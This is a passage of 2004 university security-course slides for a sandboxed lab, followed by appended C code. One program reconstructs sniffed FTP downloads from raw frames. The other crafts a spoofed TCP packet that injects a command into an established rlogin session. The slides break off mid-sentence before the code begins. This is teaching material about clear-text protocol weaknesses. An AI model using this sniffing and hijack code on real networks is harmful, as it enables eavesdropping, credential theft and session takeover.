CS155: Computer and Network Security
Programming Project 3 – Spring 2004
Matt [email protected]

Project Overview and Setup

Project Overview
- Use standard network monitoring tools to examine different networking protocols
- Use a packet capture library to automatically intercept FTP transfers
- Write a program to perform an injection attack on the RLOGIN protocol

Goals of the assignment
- Get some hands-on networking experience
- Learn how secure different protocols are
- Learn about common attacks on clear-text protocols
- DON'T end up in jail: never test your code outside of the boxes environment!

Setup
- You are given three cow images corresponding to three separate machines on the network: client, server, and attacker
- There are a number of users on the client sending network requests to services on the server
- The attacker (you!) is trying to perform different attacks (the assignment) on the client and server

Setup (2)
- All three boxes are located on the same Ethernet hub
- Ethernet is a broadcast medium: every machine sees every packet, regardless of address!
- Normally, packets not intended for a host are discarded by the network card
- But in promiscuous mode all packets are available!
[Diagram: Client, Attacker and Server attached to the same hub]

Setup (3)
- To start up the boxes, follow these steps:
      xterm -e ./string &
  Make sure to use the copy of string included with the cow images! Otherwise the attacker will not be able to see the network traffic.
      xterm -e [open|closed]box clientcow 10.64.64.64 &
      xterm -e [open|closed]box servercow 10.64.64.65 &
      xterm -e [open|closed]box attackcow 10.64.64.66 &
- You must use these exact IP addresses!

Setup (4)
- You are NOT given an account on the client and server machines. If you're good, you might get one soon!
- Once you have a password, you can remotely shut down the client and server with:
      ssh [username]@[ipaddr] /sbin/halt
- We installed halt as setuid-root (bad idea in general!)
- Until then, you won't be able to do a clean shutdown of clientcow and servercow, so keep a backup of the original images to avoid fscking

Quick TCP/IP Review

TCP/IP Overview
- On this assignment, we are only dealing with protocols that run over TCP/IP
- We assume a basic knowledge on the level of packets and ports
- If you're not that comfortable with this, stop by office hours

Relevant Network Layers
[Figure: FTP over TCP over IP over Ethernet, from http://www.erg.abdn.ac.uk/users/gorry/course/images/ftp-tcp-enet.gif]

Cliffs Notes Version
- Each TCP packet that you see is actually a TCP segment wrapped inside an IP packet, which is in turn wrapped inside an Ethernet frame:
      Ethernet Header | IP Header | TCP Header | Application Data

TCP Flags
- Synchronize flag [SYN]: used to initiate a TCP connection
- Acknowledgement flag [ACK]: used to confirm received data
- Finish flag [FIN]: used to shut down the connection

TCP Flags (2)
- Push flag [PSH]: do not buffer data on the receiver side; deliver it directly to the application
- Urgent flag [URG]: used to signify data with a higher priority than the other traffic, e.g. a Ctrl+C interrupt during an FTP transfer
- Reset flag [RST]: tells the receiver to tear down the connection immediately

Connection setup
- "Three-way handshake"
[Figure: SYN, SYN/ACK, ACK exchange, from http://www.cs.colorado.edu/~tor/sadocs/tcpip/3way.png]

Connection termination
- Either side can initiate termination
- Note that the first FIN packet may still contain data!
[Figure: FIN/ACK exchange, from http://homepages.feis.herts.ac.uk/~cs2_sn2/sn2-img62.png]

The actual assignment (finally!)

Phase 1: Sniffing
- Goal: observe network traffic, learn about different protocols
- Also: gain access to the client and server machines in order to make Phases 2 and 3 easier!
- Installed tools (must be run as root):
  - tcpdump: old faithful, just gives raw packet info
  - tethereal: like tcpdump, but with more smarts about protocols
  - tcpflow: focuses on the payload of the packets; great for examining application-level data (i.e. passwords)!

Tcpdump options
- All three network monitoring tools take similar command line options
- Can filter packets by address, port, protocol, length, TCP flags, etc.
- Make sure to read the tcpdump manpage closely!
- For your submission, we want you to list the options that you used to isolate the packets containing username/password information.

Phase 2: File Eavesdropping
- Manual packet sniffing is an interesting exercise, but programmatically capturing packets is much more powerful
- In this part of the assignment, you will write a program to reconstruct a sniffed FTP file transfer

Libpcap
- Libpcap is a packet capture library written in C
- It allows you to write code to automate packet sniffing attacks.
- The library is fairly simple to use
- Pseudocode (with the real libpcap calls filled in):
      char errbuf[PCAP_ERRBUF_SIZE];
      pcap_t *h = pcap_open_live("eth0", 65535, 1 /* promiscuous */, 1000, errbuf);
      while (1) {
          struct pcap_pkthdr hdr;
          const u_char *packet = pcap_next(h, &hdr);   /* NULL on timeout or error */
          if (packet == NULL) continue;
          // do something with the packet (hdr.caplen bytes were captured)
      }
- We give you starter code in /home/user/pp3/sniff.c on the attackcow image.

What to do
- Figure out which packets correspond to an FTP file transfer
- Detect when a transfer starts and create a local file to store the data
- Extract data from packets and write them to the file
- Figure out when the transfer completes, close the file, and exit the program

What to do (2)
- The hard part is figuring out how to parse the various layers of headers.
- You can find the header definitions at:
      Ethernet: /usr/include/net/ethernet.h
      IP:       /usr/include/netinet/ip.h
      TCP:      /usr/include/netinet/tcp.h
- You'll also need to figure out how FTP data transfers work
- Using the techniques you learned in Phase 1 might be more productive than poring over protocol docs

Phase 3: Packet Injection
- RLOGIN allows a remote login session; very similar to Telnet
- Does not ask for a password if the client machine is listed in /etc/hosts.equiv or ~/.rhosts (big convenience... even bigger vulnerability)
- After authentication, the rest of the traffic is in the clear!
- Uses one TCP channel for communication

Attacks
- Can spoof an entire TCP connection
- If the spoofed sender is present in /etc/hosts.equiv or ~/.rhosts, the server won't ask for a password
- An already established session can be hijacked by spurious
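Back to Phase 2, "What to do" and "What to do (2)": the following is an added example, not the starter code in sniff.c and not part of the original slides. It peels the Ethernet, IP and TCP headers off a raw frame (the same layout the three header files describe, parsed here by byte offset so it also runs on hosts without those headers), watches the FTP control channel (port 21) for the active-mode PORT command that announces the client's data port, and appends the payload of every segment sent to that port until the server's FIN arrives. The frames it consumes are constructed in build_frame for testing; in the assignment you would hand each packet and hdr.caplen from pcap_next to ftp_feed instead. The assumptions are the ones the comments state: active-mode FTP, a download (server to client), and in-order delivery with no retransmissions, which is what a quiet hub gives you but not what a real tool may rely on. Note also that the payload length is taken from the IP total length, not the capture length, because short Ethernet frames are padded on the wire.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <net/ethernet.h>   /* ETHERTYPE_IP */
#include <netinet/in.h>     /* IPPROTO_TCP */

#define FTP_CTRL_PORT 21
#define TCP_FLAG_FIN  0x01   /* flags byte: FIN 0x01, SYN 0x02, RST 0x04, PSH 0x08, ACK 0x10, URG 0x20 */

/* What the reconstructor needs from one frame once the three headers are peeled off. */
struct parsed {
    uint16_t sport, dport;  uint8_t flags;
    const uint8_t *payload; size_t paylen;
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Ethernet -> IPv4 -> TCP. Header lengths come from the packet itself (IHL, data offset) and
 * the payload length from the IP total length, not from the capture length: frames shorter
 * than 60 bytes are padded on the wire. Returns 0 on success, -1 for anything else. */
static int parse_frame(const uint8_t *pkt, size_t len, struct parsed *out) {
    if (len < 34 || be16(pkt + 12) != ETHERTYPE_IP) return -1;   /* 14 Ethernet + 20 IP minimum */
    const uint8_t *ip = pkt + 14;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4, tot = be16(ip + 2);   /* IHL counts 32-bit words */
    if ((ip[0] >> 4) != 4 || ihl < 20 || tot < ihl + 20 || tot > len - 14) return -1;
    if (ip[9] != IPPROTO_TCP) return -1;
    const uint8_t *tcp = ip + ihl;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;                     /* data offset, also in words */
    if (doff < 20 || ihl + doff > tot) return -1;
    out->sport = be16(tcp);  out->dport = be16(tcp + 2);  out->flags = tcp[13];
    out->payload = tcp + doff;
    out->paylen = tot - ihl - doff;
    return 0;
}

/* Active-mode FTP: the client announces its data port on the control channel with
 * "PORT h1,h2,h3,h4,p1,p2"; the port is p1*256+p2. Returns 0 for any other line. */
static uint16_t parse_port_cmd(const uint8_t *p, size_t n) {
    char line[64];
    unsigned h[4], p1, p2;
    if (n < 6 || n >= sizeof line || memcmp(p, "PORT ", 5) != 0) return 0;
    memcpy(line, p, n);  line[n] = '\0';
    if (sscanf(line + 5, "%u,%u,%u,%u,%u,%u", &h[0], &h[1], &h[2], &h[3], &p1, &p2) != 6) return 0;
    return (p1 > 255 || p2 > 255) ? 0 : (uint16_t)(p1 * 256 + p2);
}

/* One download in progress. A real tool needs TCP reassembly (sequence numbers, retransmits,
 * reordering); this keeps only the in-order case, which is what a quiet hub actually produces. */
struct ftp_recon {
    uint16_t data_port;          /* client port from the last PORT command, 0 until seen */
    uint8_t  file[4096];         /* stands in for the local file the assignment writes */
    size_t   filelen;
    int      done;
};

/* Feed one frame. Returns 1 when the data connection closes (file complete), 0 otherwise, -1 if not TCP/IP. */
static int ftp_feed(struct ftp_recon *r, const uint8_t *pkt, size_t len) {
    struct parsed p;
    if (parse_frame(pkt, len, &p) < 0) return -1;
    if (p.sport == FTP_CTRL_PORT || p.dport == FTP_CTRL_PORT) {          /* control channel */
        uint16_t port = parse_port_cmd(p.payload, p.paylen);
        if (port) { r->data_port = port; r->filelen = 0; r->done = 0; } /* transfer about to start */
        return 0;
    }
    if (r->data_port == 0 || r->done || p.dport != r->data_port) return 0;   /* not our data channel */
    if (p.paylen && r->filelen + p.paylen <= sizeof r->file) {
        memcpy(r->file + r->filelen, p.payload, p.paylen);
        r->filelen += p.paylen;
    }
    if (p.flags & TCP_FLAG_FIN) { r->done = 1; return 1; }    /* the FIN may carry the last bytes */
    return 0;
}

/* Constructed test frame: Ethernet/IPv4/TCP with no options; checksums are left zero because
 * the parser above does not verify them. Returns the frame length. */
static size_t build_frame(uint8_t *buf, uint16_t sport, uint16_t dport, uint8_t flags, const char *data) {
    size_t n = strlen(data), tot = 40 + n;
    memset(buf, 0, 54);
    buf[12] = ETHERTYPE_IP >> 8;  buf[13] = ETHERTYPE_IP & 0xff;
    buf[14] = 0x45;  buf[16] = (uint8_t)(tot >> 8);  buf[17] = (uint8_t)tot;  buf[23] = IPPROTO_TCP;
    buf[34] = (uint8_t)(sport >> 8);  buf[35] = (uint8_t)sport;
    buf[36] = (uint8_t)(dport >> 8);  buf[37] = (uint8_t)dport;
    buf[46] = 5 << 4;  buf[47] = flags;                          /* data offset 5 words, flags */
    memcpy(buf + 54, data, n);
    return 54 + n;
}

static struct ftp_recon demo;

/* Replay a constructed download: PORT on the control channel, data from server port 20 to the
 * announced client port 1025 (4*256+1), then a FIN|ACK carrying the final byte. Returns the last ftp_feed result. */
static int demo_transfer(void) {
    uint8_t f[128];  int rc;
    memset(&demo, 0, sizeof demo);
    rc = ftp_feed(&demo, f, build_frame(f, 1030, 21, 0x18, "PORT 10,64,64,64,4,1\r\n"));
    rc = ftp_feed(&demo, f, build_frame(f, 20, 1025, 0x18, "hello, "));
    rc = ftp_feed(&demo, f, build_frame(f, 20, 1025, 0x18, "world"));
    rc = ftp_feed(&demo, f, build_frame(f, 20, 1025, 0x11, "\n"));
    return rc;
}
```

After demo_transfer() returns 1, demo.file holds the 13 bytes "hello, world\n". Passive mode (the server's "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply) and uploads (data flowing toward port 20) need the analogous checks on the other direction; they are left out here, not because they are hard but because the sniffing in Phase 1 tells you which mode the client on the hub actually uses.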
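For Phase 3, the "Attacks" slide says a spurious packet can hijack an established rlogin session. The following is an added example, not from the original slides and not libnet code (the libnet slides are not on this page; libnet would assemble these bytes for you). It shows what such a packet has to contain to be accepted: the client's addresses and ports, a sequence number equal to what the server last acknowledged, an acknowledgement covering everything the server has sent, and correct IP and TCP checksums, the latter computed over the pseudo-header. The scenario values (server 10.64.64.65 on the rlogin port 513, client 10.64.64.64 on privileged port 1023, seq 1000, ack 2000, 5 bytes just sent) are constructed; on the boxes they would come from the Phase 1 capture. Sending the packet (a raw socket or libnet) is deliberately left out.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>     /* IPPROTO_TCP */

/* Facts that Phase 1 sniffing gives you about the latest server->client segment of a session. */
struct observed {
    uint32_t client_ip, server_ip;      /* host byte order */
    uint16_t client_port, server_port;
    uint32_t seq, ack;                  /* the server's sequence and acknowledgement numbers */
    uint32_t datalen;                   /* bytes of data that segment carried */
};

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* RFC 1071 checksum: ones'-complement sum of 16-bit words, carries folded back in, then inverted. */
static uint32_t csum_add(uint32_t sum, const uint8_t *p, size_t n) {
    for (; n > 1; p += 2, n -= 2) sum += (uint32_t)(p[0] << 8 | p[1]);
    if (n) sum += (uint32_t)(p[0] << 8);                          /* odd trailing byte, zero padded */
    return sum;
}
static uint16_t csum_fold(uint32_t sum) {
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* TCP checksum covers a pseudo-header (src, dst, zero, protocol, TCP length) plus header and data. */
static uint16_t tcp_checksum(const uint8_t *ip, const uint8_t *tcp, size_t tcplen) {
    uint8_t pseudo[12];
    memcpy(pseudo, ip + 12, 8);
    pseudo[8] = 0;  pseudo[9] = IPPROTO_TCP;  put16(pseudo + 10, (uint16_t)tcplen);
    return csum_fold(csum_add(csum_add(0, pseudo, 12), tcp, tcplen));
}

/* Build the IPv4+TCP packet that pushes `data` into the session as if the client had typed it.
 * The client's next sequence number is whatever the server last acknowledged, and our
 * acknowledgement is the server's seq plus the data it sent, so the server's stack takes the
 * segment as in-order. Returns the packet length, or 0 if `out` is too small. */
static size_t craft_injection(const struct observed *o, const char *data, uint8_t *out, size_t cap) {
    size_t n = strlen(data), tot = 40 + n;
    if (tot > cap || tot > 0xffff) return 0;
    memset(out, 0, 40);
    out[0] = 0x45;  put16(out + 2, (uint16_t)tot);               /* IPv4, 20-byte header, total length */
    out[8] = 64;  out[9] = IPPROTO_TCP;                           /* TTL, protocol */
    put32(out + 12, o->client_ip);  put32(out + 16, o->server_ip);
    uint8_t *tcp = out + 20;
    put16(tcp, o->client_port);  put16(tcp + 2, o->server_port);
    put32(tcp + 4, o->ack);                                       /* seq: what the server expects next */
    put32(tcp + 8, o->seq + o->datalen);                          /* ack: everything the server has sent */
    tcp[12] = 5 << 4;  tcp[13] = 0x18;  put16(tcp + 14, 8192);     /* 20-byte header, PSH|ACK, window */
    memcpy(tcp + 20, data, n);
    put16(out + 10, csum_fold(csum_add(0, out, 20)));             /* IP header checksum */
    put16(tcp + 16, tcp_checksum(out, tcp, 20 + n));              /* TCP checksum (field was zero) */
    return tot;
}

/* What a receiving stack does: summing a header with its checksum field included must fold to 0. */
static int checksums_ok(const uint8_t *pkt, size_t len) {
    if (len < 40) return 0;
    return csum_fold(csum_add(0, pkt, 20)) == 0 && tcp_checksum(pkt, pkt + 20, len - 20) == 0;
}

static uint8_t demo_pkt[128];

/* Constructed scenario: the server 10.64.64.65 (rlogin, TCP port 513) just sent 5 bytes with
 * seq 1000 and ack 2000 to the client 10.64.64.64, which is using privileged port 1023. */
static size_t demo_inject(void) {
    struct observed o = { 0x0a404040, 0x0a404041, 1023, 513, 1000, 2000, 5 };
    return craft_injection(&o, "echo hijacked\r", demo_pkt, sizeof demo_pkt);
}

int main(void) {
    size_t n = demo_inject();
    printf("%zu-byte packet, checksums %s, seq %u, ack %u\n", n,
           checksums_ok(demo_pkt, n) ? "ok" : "bad",
           (unsigned)get32(demo_pkt + 24), (unsigned)get32(demo_pkt + 28));
    return 0;
}
```

Two things the code makes visible that the slide only hints at. First, the real client still holds the connection: when the server echoes the injected bytes, the client's stack sees data it did not send and answers with its own (now stale) sequence numbers, and the two ends fall into an ACK storm until one of them resets. Second, the sequence and acknowledgement numbers are the only "secret" here, and on a shared hub they are not secret at all, which is the whole argument for authenticating and encrypting the session rather than trusting /etc/hosts.equiv.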